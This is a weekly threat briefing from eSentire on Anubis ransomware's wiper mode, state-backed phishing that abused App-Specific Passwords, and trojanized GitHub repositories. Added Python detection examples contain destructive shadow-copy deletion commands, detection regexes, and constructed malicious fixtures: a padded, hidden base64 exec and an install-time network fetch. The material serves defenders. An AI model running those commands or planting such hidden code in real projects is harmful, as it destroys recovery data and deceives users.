TLP: CLEAR - This information may be shared publicly
eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
Bottom Line: Recent reports indicate that the Anubis Ransomware-as-a-Service (RaaS) toolkit has incorporated a wiper module into the malware. This new module can be used to permanently delete the content of files from infected hosts, adding additional pressure to victim organizations to meet extortion demands.
On June 13th, 2025, Trend Micro released a report detailing the tactical evolution of an emerging Ransomware-as-a-Service (RaaS) operation known as Anubis. Active since December 2024, Anubis provides its affiliates with a double extortion model, combining data encryption with the threat of data exposure. The latest report highlights the introduction of a destructive wiper feature, enabling the affiliates with both data encryption and data destruction capabilities.
Anubis first appeared in late 2024 as a variant of Sphinx ransomware, rebranding itself with an updated ransom note function. In February 2025, representatives of Anubis RaaS introduced new affiliate programs, namely “Anubis Ransomware – 80/20,” “Anubis Data Ransom – 60/40,” and “Access Monetization – 50/50,” on cybercrime forums such as RAMP and XSS. These offerings present varied profit-sharing structures to attract a broader base of affiliates. Anubis has been known to target diverse industries, including healthcare, engineering, and construction, across the United States, Canada, Australia, and Peru.
The ransomware typically spreads through spear-phishing emails containing malicious links, and it exploits legitimate administrative accounts to bypass detection mechanisms. Once deployed, Anubis deletes Windows Volume Shadow copies to block recovery options and proceeds to encrypt system directories. It utilizes the same encryption algorithm observed in the EvilByte/Prince ransomware family, modifies the icons of encrypted files, and drops a ransom note. The recent addition of the wiper feature introduces a /WIPEMODE parameter, which permanently deletes the contents of the files, further complicating recovery efforts and increasing pressure on victims to comply with ransom demands.
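The pre-encryption behaviour described above (shadow copy deletion, then encryption or the /WIPEMODE switch) is what endpoint telemetry can catch before files are lost. The following is an added example, not code from the briefing or from eSentire's detection content: it runs a handful of command-line rules over constructed process-creation records. The record field names (host, image, cmdline, parent) are an assumption for this example rather than any product's schema, and the sample events are made up.

```python
# Added example: flag process-creation events matching the precursor behaviour
# described in the briefing (Volume Shadow Copy deletion, recovery tampering)
# and the /WIPEMODE switch. Records and field names are constructed for the example.
import re
from dataclasses import dataclass

# Constructed process-creation records; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet", "parent": "cmd.exe"},
    {"host": "WS01", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic shadowcopy delete", "parent": "cmd.exe"},
    {"host": "WS02", "image": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "cmdline": "update.exe /WIPEMODE", "parent": "explorer.exe"},
    {"host": "WS03", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows", "parent": "powershell.exe"},  # benign
    {"host": "WS03", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt", "parent": "explorer.exe"},       # benign
]

# (rule name, regex over the command line, severity)
RULES = [
    ("shadow_copy_delete_vssadmin",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I), "high"),
    ("shadow_copy_delete_wmic",
     re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I), "high"),
    ("shadow_copy_delete_powershell",
     re.compile(r"Win32_ShadowCopy.*(Delete\(|Remove-WmiObject|Remove-CimInstance)", re.I), "high"),
    ("recovery_disable_bcdedit",
     re.compile(r"bcdedit(\.exe)?\s+.*recoveryenabled\s+no", re.I), "high"),
    # The wiper switch named in the Trend Micro report; the binary name is unknown,
    # so only the switch itself is matched.
    ("anubis_wipemode_switch",
     re.compile(r"(^|\s)/WIPEMODE(\s|$)", re.I), "critical"),
]


@dataclass(frozen=True)
class Alert:
    host: str
    rule: str
    severity: str
    cmdline: str


def detect(events):
    """Return one Alert per (event, rule) match."""
    alerts = []
    for ev in events:
        for name, pattern, severity in RULES:
            if pattern.search(ev["cmdline"]):
                alerts.append(Alert(ev["host"], name, severity, ev["cmdline"]))
    return alerts


def hosts_with_recovery_inhibition(events):
    """Hosts where shadow copies or recovery were tampered with. This is the
    step that precedes encryption, so it is a sensible trigger for host isolation."""
    return sorted({a.host for a in detect(events) if a.severity == "high"})


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.host}: {a.rule} <- {a.cmdline}")
    print("isolate:", hosts_with_recovery_inhibition(SAMPLE_EVENTS))
```

The "list shadows" event on WS03 is deliberately left unflagged: backup software and administrators enumerate shadow copies routinely, and a rule that fires on every vssadmin invocation is quickly tuned out. The deletion rules, by contrast, have few legitimate sources outside scheduled maintenance and are worth treating as an isolation trigger rather than a ticket.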
RaaS models have been favored by threat actors as they allow even inexperienced attackers to launch sophisticated ransomware campaigns. The affiliate programs promoted by Anubis extend beyond standard RaaS offerings by enabling affiliates to monetize not only encrypted data but also stolen sensitive information and access credentials. The addition of a wiper functionality significantly escalates the threat, posing a serious security concern for organizations. At the same time, it enhances the appeal of the platform to potential affiliates, making Anubis a more attractive candidate in the RaaS landscape.
A report by KELA assesses that Anubis’ operators may have been former affiliates of other ransomware groups or have experience with data extortion and ransomware-related activities, based on the actor’s statements regarding their ransomware capabilities and the informative, well-written investigative articles on their victims.
While the primary goal of traditional ransomware is to encrypt data and demand payment for its decryption, many modern variants like Anubis ransomware employ robust encryption techniques that, without the decryption key, make data restoration virtually impossible. This blurs the line between ransomware and wipers. While a wiper is designed explicitly to destroy data with no possibility of recovery, advanced ransomware can have the same practical effect. With functionalities like Anubis’s /WIPEMODE, attackers now have the intentional choice to use ransomware as a wiper, further emphasizing the dual threat of data loss and operational disruption. This evolution intensifies the urgency for organizations to adopt a defense-in-depth approach that includes comprehensive backup, detection, and incident response strategies.
The eSentire Threat Intelligence Team is consistently tracking the developments in Anubis RaaS for new detection opportunities. eSentire MDR Suite has detections in place to identify activity associated with ransomware deployment.
Bottom Line: Russian state-sponsored threat actors, identified as UNC6293, conducted a sophisticated phishing campaign against prominent academics and critics of the Russian government by impersonating U.S. State Department officials. This operation exploited Google account features to gain persistent access to victims' communications, indicating a targeted effort to extract valuable insights on Russian affairs.
On June 18th, 2025, the Google Threat Intelligence Group (GTIG) and The Citizen Lab reported that Russian state-sponsored threat actors, identified as UNC6293, posed as U.S. State Department officials to target prominent academics and critics of the Russian government. One of the victims of this sophisticated social engineering campaign was Mr. Keir Giles, a recognized academic expert on Russian information operations. He was successfully deceived into creating and sharing App-Specific Passwords (ASPs), which allowed attackers to bypass Multi-Factor Authentication (MFA). The attacker impersonated a U.S. State Department official and orchestrated the attack over several weeks through detailed, credible interactions. Google later detected and disrupted the operation, attributing it to the Russian state-backed group UNC6293, which has a low-confidence association with APT29/ICECAP.
The attack began on May 22nd, 2025, when Mr. Giles received an email from someone claiming to be from the U.S. State Department. The message appeared legitimate, as it included four “@state.gov” addresses in the CC field and was received during typical U.S. working hours. However, all the .gov emails were fictitious, created by the attacker to enhance credibility. The threat actor eventually convinced Mr. Giles to register for a fake “MS DoS Guest Tenant” platform by following instructions in a well-crafted PDF document. This document guided him through creating and submitting App-Specific Passwords under the guise of setting up secure communications with the State Department.
The attacker asked Mr. Giles to enter “ms.state.gov” in the application name field when generating the ASP. Ultimately, Mr. Giles created and sent multiple ASPs, unknowingly granting persistent access to his accounts. Google later identified suspicious login activity originating from a Digital Ocean IP address and locked down the impacted accounts.
GTIG identified two distinct campaigns that occurred between April and June 2025, differentiated by their ASP naming patterns: "ms.state.gov" in the first campaign and themes related to Ukraine and Microsoft in the second. Through the analysis of shared infrastructure, including residential proxies and VPS servers, GTIG linked both campaigns to the same cluster.
The use of App-Specific Passwords in this type of attack is a relatively new development. These passwords are typically used for connecting apps to email services without requiring full credentials and are not protected by MFA. As a result, they represent a soft target for sophisticated threat actors seeking to circumvent security controls. This campaign highlights a new trend in phishing operations, where attackers utilize App-Specific Passwords to circumvent MFA through highly convincing and methodical deception. As attackers continue to refine their techniques, both individuals and organizations must remain vigilant.
This is not the first time that a sophisticated Russian APT group has employed advanced social engineering tactics, showing a specific interest by these groups in attacks misusing legitimate features. Microsoft and Volexity both released long-form reports on suspected Russian state-sponsored APT groups (Storm-2372, CozyLarch, UTA0304, and UTA0307) carrying out Device Code Authentication phishing attacks to compromise victim organizations. Device Code Authentication phishing involves exploiting the “device code authentication flow to capture authentication tokens”, allowing threat actors to access target accounts and other services that the account has access to. In observed attacks, phishing emails impersonated Microsoft Teams meeting invitations and prompted users to authenticate via a threat actor-generated device code; using the device code would provide threat actors with a valid access token, allowing them to access victim resources including accounts, emails, and cloud storage without requiring a password.
As attackers move beyond basic credential theft, they are investing in long-form, personalized, and believable engagement with targets. The success of these techniques may encourage threat actors to avoid using malicious attachments in their communications while engaging with top-level executives, as the majority of advanced security products block or flag these attachments right from the start. For defenders, this raises important considerations: security awareness training must go beyond “don’t click suspicious links” to include education on trust manipulation, deceptive workflows, and account feature misuse. Moreover, security teams must audit the tools and features users have access to, such as ASPs, and implement guardrails. Users are also recommended to carefully monitor notifications about ASP creation sent to their Gmail, recovery email, and signed-in devices to ensure authenticity.
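Both techniques in this section (ASPs and device code phishing) share one detectable trait: the attacker's first successful sign-in with the newly obtained credential comes from infrastructure the user has never authenticated from. The following added example, which is not code from the briefing, Google, Microsoft, or Volexity, applies that check to the device code case over constructed sign-in records. The field names (user, ip, protocol, result) are an assumption modelled loosely on identity-provider sign-in logs, and the sample records are made up.

```python
# Added example: flag successful device-code sign-ins from an IP address the
# user has no earlier interactive sign-in from. Records and field names are
# constructed for the example and are not any provider's real schema.

# Constructed sign-in history (ISO-8601 timestamps sort lexicographically).
SAMPLE_SIGNINS = [
    # alice's normal history from her usual office address
    {"time": "2025-06-10T09:01:00", "user": "alice@example.org", "ip": "203.0.113.10",
     "protocol": "interactive", "app": "Outlook", "result": "success"},
    {"time": "2025-06-11T09:05:00", "user": "alice@example.org", "ip": "203.0.113.10",
     "protocol": "interactive", "app": "Teams", "result": "success"},
    # device-code sign-in from an address alice has never used: the phishing pattern
    {"time": "2025-06-12T14:22:00", "user": "alice@example.org", "ip": "198.51.100.77",
     "protocol": "deviceCode", "app": "Microsoft Office", "result": "success"},
    # bob enrolling a CLI tool from his known address: expected device-code use
    {"time": "2025-06-01T08:00:00", "user": "bob@example.org", "ip": "203.0.113.11",
     "protocol": "interactive", "app": "Outlook", "result": "success"},
    {"time": "2025-06-12T15:00:00", "user": "bob@example.org", "ip": "203.0.113.11",
     "protocol": "deviceCode", "app": "Azure CLI", "result": "success"},
    # a failed attempt must not count as "known" history
    {"time": "2025-06-12T14:10:00", "user": "alice@example.org", "ip": "198.51.100.77",
     "protocol": "interactive", "app": "Outlook", "result": "failure"},
]


def known_ips_before(signins, user, when):
    """IPs the user signed in from successfully, interactively, before `when`.
    Device-code successes are excluded on purpose: a phished token must not
    bootstrap its own source address into the baseline."""
    return {s["ip"] for s in signins
            if s["user"] == user
            and s["result"] == "success"
            and s["protocol"] != "deviceCode"
            and s["time"] < when}


def suspicious_device_code_signins(signins):
    """Device-code sign-ins whose source IP is absent from the user's baseline."""
    flagged = []
    for s in signins:
        if s["protocol"] != "deviceCode" or s["result"] != "success":
            continue
        if s["ip"] not in known_ips_before(signins, s["user"], s["time"]):
            flagged.append(s)
    return flagged


def device_code_users(signins):
    """Everyone who used the flow at all: the audit list for deciding who
    actually needs it before blocking it for the rest."""
    return sorted({s["user"] for s in signins if s["protocol"] == "deviceCode"})


if __name__ == "__main__":
    for s in suspicious_device_code_signins(SAMPLE_SIGNINS):
        print(f"REVIEW {s['user']} device-code sign-in from {s['ip']} at {s['time']} ({s['app']})")
    print("device-code users:", device_code_users(SAMPLE_SIGNINS))
```

The baseline deliberately ignores failed attempts and earlier device-code successes, so an attacker cannot "warm up" an address before the real sign-in. For tenants where the flow is genuinely needed only by a few accounts, the `device_code_users` list is the starting point for restricting it to those accounts and alerting on everyone else; the same never-seen-source logic applies to the first use of a newly created ASP.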
Bottom Line: A Russian threat actor group, Banana Squad, involved in a supply chain attack campaign, was observed leveraging malicious GitHub repositories to deliver Python-based trojanized tools serving as information stealers.
On June 18th, 2025, ReversingLabs published a report on a supply chain attack, targeting GitHub repositories. Supply chain attacks are cyberattacks that target a trusted third-party vendor, which can impact customer organizations that are part of the supply chain. In the reported campaign, ReversingLabs observed the Russian threat group Banana Squad publishing 67 malicious repositories to GitHub, which were “trojanized look-alikes” of identically named legitimate repositories, relating to Python-based hacking tools.
Banana Squad was first reported on by Checkmarx in April 2023 and were observed performing similar supply chain attacks within GitHub. This campaign involved the deployment of Windows-based payloads on infected hosts, which were designed to steal sensitive data from applications, web browsers, and cryptocurrency wallets. ReversingLabs uncovered the new campaign while reviewing malicious URL indicators found within their network threat intelligence dataset.
ReversingLabs observed that for many of the malicious repositories involved in this campaign, the owner only had one repository listed under their GitHub account, noting that this was an indication that the accounts were created solely for this campaign. ReversingLabs attributed the campaign to Banana Squad based on the payload URL structure observed and the structure of the trojanized Python files contained within the malicious repositories. ReversingLabs reported these repositories to GitHub, which removed them; ReversingLabs notes that they do not have any information on how many times the files were downloaded while they were active.
Supply chain attacks have increased in popularity in recent years, with reports indicating that these attacks surged by 431% between 2021 and 2023, and are continuing to rise as of 2025. Notable supply chain attacks include the Russian state-sponsored group Nobelium (APT29, Cozy Bear) conducting the SolarWinds attack in 2020 which delivered backdoor malware to thousands of SolarWinds customers, and the REvil ransomware group exploiting a Zero-Day vulnerability within Kaseya VSA to push ransomware to the customers of impacted Managed Security Providers (MSPs), in July 2021. These examples underscore the threat of supply chain attacks, where threat actors can target multiple organizations through the compromise of one access point, and exploit the trust that is placed in third-party vendors within the supply chain.
Supply chain attacks involving GitHub, and other Open-Source Software (OSS) platforms, are also not novel techniques, with many campaigns having been observed where threat actors utilize similar tactics. Examples include the North Korean-linked Lazarus Group being observed uploading malicious Node Package Manager (NPM) packages to GitHub containing the BeaverTail malware, and a financially motivated threat actor, dubbed Water Curse by Trend Micro, deploying malicious Visual Studio project configuration files within open-source penetration testing applications found on GitHub. All these examples highlight the notion that threat actors abuse the inherent trust that organizations place in GitHub's repository infrastructure, leveraging it as a means for malware distribution.
ReversingLabs does not provide specifics on the intended outcome of the recently observed Banana Squad campaign, but historic campaigns from the group resulted in the deployment of information stealer malware. Based on this trend, it is likely that the reported campaign results in a similar outcome, with an intended goal of stealing sensitive data from infected hosts. The usage of information stealer malware has been observed increasing year over year, with a 31% increase in incidents from 2023 to 2024, and information stealer infections resulting in 75% of the 3.2 billion credentials stolen in 2024. The theft of data from these infections can be sold to other threat actors, as they can allow direct access to systems while bypassing security measures, enabling further attacks.
To protect against GitHub supply chain attacks, organizations that utilize GitHub should validate the build files, scripts, and histories of all repositories and third-party code used within the environment prior to its implementation. If GitHub is not used, its access should be restricted to prevent unauthorized use of open-source tools. Organizations should ensure that Endpoint Detection and Response (EDR) tools are installed on all assets, implement regular password rotation policies, and enforce Multi-Factor Authentication on all accounts, which can reduce the impact of stolen credentials. eSentire MDR for Endpoint has detections in place monitoring for script download activity from GitHub, and eSentire’s Threat Response Unit (TRU) continues to track these campaigns for additional information and detection opportunities.
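"Validate the build files and scripts" is easier to act on with a concrete first pass. The following is an added example, not code from ReversingLabs, Checkmarx, or eSentire, and it makes no claim about how the Banana Squad files are actually constructed: it runs a few generic heuristics over the Python files of a repository before anyone executes them, flagging dynamic code execution, base64 decoding, import-time network activity, and source lines padded with long whitespace runs that push code off-screen. The sample files, thresholds, and rule names are this example's own constructions.

```python
# Added example: pre-use heuristic scan of Python files from a third-party
# repository. Heuristics and sample files are constructed for this example.
import ast
import re

# Constructed repository contents: one benign module, one with a hidden
# exec() far to the right of a padded line, one with import-time networking.
SAMPLE_FILES = {
    "scanner.py": (
        "import socket\n"
        "\n"
        "def scan(host, port):\n"
        "    s = socket.socket()\n"
        "    return s.connect_ex((host, port)) == 0\n"
    ),
    "utils.py": (
        "import os\n"
        "print('loading')" + " " * 300
        + "; exec(__import__('base64').b64decode('cHJpbnQoImhpIik='))\n"  # decodes to print("hi")
    ),
    "setup.py": (
        "from setuptools import setup\n"
        "import urllib.request\n"
        "urllib.request.urlopen('http://198.51.100.5/p').read()\n"
        "setup(name='tool')\n"
    ),
}

LONG_LINE = 200          # characters before a line is considered suspicious
PADDING_RUN = r"[ \t]{100,}"
DYNAMIC_EXEC = {"exec", "eval"}
DECODERS = {"b64decode", "a85decode", "b85decode"}
NETWORK = {"urlopen", "urlretrieve"}


def _call_name(node):
    """Bare function name of a Call node, e.g. urlopen for urllib.request.urlopen(...)."""
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        return f.attr
    return None


def scan_source(name, src):
    """Return (file, line, finding) tuples for one Python source file."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        if len(line) > LONG_LINE and re.search(PADDING_RUN, line):
            findings.append((name, lineno, "long_line_padding"))
    try:
        tree = ast.parse(src)
    except SyntaxError:
        return findings + [(name, 0, "unparseable")]
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            cn = _call_name(node)
            if cn in DYNAMIC_EXEC:
                findings.append((name, node.lineno, "dynamic_exec"))
            elif cn in DECODERS:
                findings.append((name, node.lineno, "base64_decode"))
    # Module-level statements run on import or on `pip install`; network
    # calls there (outside any def/class) deserve a look before installing.
    for stmt in tree.body:
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue
        for node in ast.walk(stmt):
            if isinstance(node, ast.Call) and _call_name(node) in NETWORK:
                findings.append((name, node.lineno, "import_time_network"))
    return findings


def scan_repo(files):
    """Map file name -> findings for a dict of {name: source}."""
    return {name: scan_source(name, src) for name, src in files.items()}


def verdict(report):
    """'block' if any file shows execution-hiding or install-time networking,
    'review' for decoding alone, otherwise 'clean'."""
    kinds = {f[2] for findings in report.values() for f in findings}
    if kinds & {"dynamic_exec", "long_line_padding", "import_time_network", "unparseable"}:
        return "block"
    return "review" if kinds else "clean"


if __name__ == "__main__":
    report = scan_repo(SAMPLE_FILES)
    for name, findings in report.items():
        for _, line, kind in findings:
            print(f"{name}:{line}: {kind}")
    print("verdict:", verdict(report))
```

The scan never executes or decodes anything from the repository; it reads the files as text and as an AST. It is a triage gate, not a verdict on intent, which is why the ownership signal the report describes (an account with a single repository) belongs alongside it as a separate, human-reviewed check.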
The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.
Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our Atlas Security Operations Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research, and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and incredible cybersecurity acumen.